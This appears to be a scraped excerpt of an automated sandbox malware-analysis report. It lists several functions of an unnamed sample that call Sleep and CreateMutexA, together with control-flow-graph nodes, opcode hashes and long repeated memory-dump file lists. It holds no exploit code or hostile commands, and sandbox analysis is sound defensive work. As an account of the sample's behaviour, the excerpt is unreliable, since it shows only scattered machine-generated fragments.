                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0bddd0fc38eeac027701a1cb37cce22e2cdf91cf3401bd713ad332ae4f24625c
                                                                                                                                                                                                                                                                            • Instruction ID: 028c2881aae31a242e9ea3d337a85fa71578bf1ebfebbe375107e095ed78ab13
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bddd0fc38eeac027701a1cb37cce22e2cdf91cf3401bd713ad332ae4f24625c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA315931B042048BFB18DB78ED897AEB7B2EB86315F248318E814972D2C73599888752
                                                                                                                                                                                                                                                                            Function 00059ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 457 59adc-59ae8 458 59afe-59d91 call 6d663 call 67a00 call 55c10 call 58b30 call 68220 call 67a00 call 55c10 call 58b30 call 68220 457->458 459 59aea-59af8 457->459 459->458 461 5a917 459->461 463 5a953-5a994 Sleep CreateMutexA 461->463 464 5a917 call 86c6a 461->464 469 5a9a7-5a9a8 463->469 470 5a996-5a998 463->470 464->463 470->469 472 5a99a-5a9a5 470->472 472->469
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 74cae66dfc8fe9e0e19a9df7e4b7f5a716e2ae847e2b679de53f4023e62ce853
                                                                                                                                                                                                                                                                            • Instruction ID: 988960ee271dcd01e2f0ee0a1786ba3f94b62c07913bc83fb587f4a0570ac880
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74cae66dfc8fe9e0e19a9df7e4b7f5a716e2ae847e2b679de53f4023e62ce853
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06216B31704200DBFB189B68FDC976EF7A2EBC2311F208319E808C72D2DB7599888712
                                                                                                                                                                                                                                                                            Function 0005A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 525 5a856-5a86e 526 5a870-5a87c 525->526 527 5a89c-5a89e 525->527 530 5a892-5a899 call 6d663 526->530 531 5a87e-5a88c 526->531 528 5a8a0-5a8a7 527->528 529 5a8a9-5a8b1 call 57d30 527->529 532 5a8eb-5a916 call 680c0 528->532 541 5a8e4-5a8e6 529->541 542 5a8b3-5a8bb call 57d30 529->542 530->527 531->530 534 5a94e-5a987 call 86c6a Sleep CreateMutexA 531->534 546 5a98e-5a994 534->546 541->532 542->541 547 5a8bd-5a8c5 call 57d30 542->547 548 5a9a7-5a9a8 546->548 549 5a996-5a998 546->549 547->541 553 5a8c7-5a8cf call 57d30 547->553 549->548 551 5a99a-5a9a5 549->551 551->548 553->541 557 5a8d1-5a8d9 call 57d30 553->557 557->541 560 5a8db-5a8e2 557->560 560->532
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: cd43fdf1e47eed8c6f737ab8844e84f4a133f3fbfcb3ae3f7e6a685655c36c00
                                                                                                                                                                                                                                                                            • Instruction ID: 95ed867e199ad58bbacb6863326df0b6cd938636d8348223379e44bb2d5f4948
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd43fdf1e47eed8c6f737ab8844e84f4a133f3fbfcb3ae3f7e6a685655c36c00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B2130313481019AFB24A768E85677F73A69F83302F244B16ED08963D2CE7A554D9263
                                                                                                                                                                                                                                                                            Function 0005A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 502 5a34f-5a35b 503 5a371-5a39a call 6d663 502->503 504 5a35d-5a36b 502->504 510 5a39c-5a3a8 503->510 511 5a3c8-5a916 call 680c0 503->511 504->503 506 5a93a 504->506 508 5a953-5a994 Sleep CreateMutexA 506->508 509 5a93a call 86c6a 506->509 518 5a9a7-5a9a8 508->518 519 5a996-5a998 508->519 509->508 512 5a3be-5a3c5 call 6d663 510->512 513 5a3aa-5a3b8 510->513 512->511 513->506 513->512 519->518 522 5a99a-5a9a5 519->522 522->518
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 419061392ba8de7c567c7fb0e0297a50fc316482b125b927f07077d22907d96f
                                                                                                                                                                                                                                                                            • Instruction ID: 7ebd271295c11d6baa00fb47ac6af0d23c2182ba77564ff0b164f1d049d703a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 419061392ba8de7c567c7fb0e0297a50fc316482b125b927f07077d22907d96f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12214C317442009BFB18DB68FD8576EB7A2DBD2315F348719F804976D1C77596888352
                                                                                                                                                                                                                                                                            Function 00057D30 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
